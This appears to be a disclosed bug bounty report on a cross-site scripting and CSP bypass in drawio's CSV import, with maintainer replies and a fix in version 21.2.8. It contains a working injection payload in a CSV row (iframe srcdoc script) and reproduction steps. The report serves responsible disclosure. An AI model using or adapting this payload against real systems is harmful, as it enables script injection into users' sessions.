Cross-site Scripting and CSP Bypass in in jgraph/drawio


Reported on

May 4th 2023


The application allows the user to import a CSV template into the schema, but does not clean the input from the columns resulting in any javascript code being executed.

Proof of Concept

## Example CSV import. Use ## for comments and # for configuration. Paste CSV below.
## The following names are reserved and should not be used (or ignored):
## id, tooltip, placeholder(s), link and label (see below)
# connect: {"from": "manager", "to": "name", "invert": true, "label": "manages", \
#          "style": "curved=1;endArrow=blockThin;endFill=1;fontSize=11;"}
# connect: {"from": "refs", "to": "id", "style": "curved=1;fontSize=11;"}
# layout: auto
## ---- CSV below this line. First line are column names. ----
Tessa Miller'"><iframe srcdoc='<script src=;-alert(document.domain)-&#x22;></script>'>,CFO,emi,Office 1,,,default,#6c8ebf,,,

Step to reproduce

Click Insert button -> Advanced -> CSV -> Paste the payload above -> Trigger XSS




XSS, in some cases it is possible to rce on the desktop app.

We are processing your report and will contact the jgraph/drawio team within 24 hours. 7 months ago
7 months ago


Public link: PoC

7 months ago



If the public link doesn't trigger XSS after the first time, please refresh the url again.


David Benson
7 months ago


Hi, thanks for the report. The base report is certainly valid. Could you just clarify a few things please:

"in some cases it is possible to rce on the desktop app." That would be a serious issue, but you must provide a PoC.

Looking at the severity,

Why is the availability marked as low? How does this affect the service availability?

Nhien.IT modified the report
7 months ago
7 months ago



As in previous reports I see that some other researchers can abuse this vulnerability to upgrade to RCE but I haven't found a way to exploit it yet.

As for severity I'm a bit confused that availability is None. I just updated!

Thank you for this incident!

David Benson validated this vulnerability 7 months ago

Thanks. We haven't managed to recreate problem in the desktop version to date.

Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
7 months ago


Thanks @maintainer

David Benson marked this as fixed in 21.2.8 with commit c7ac63 7 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Jun 1st 2023
David Benson published this vulnerability 6 months ago
to join this conversation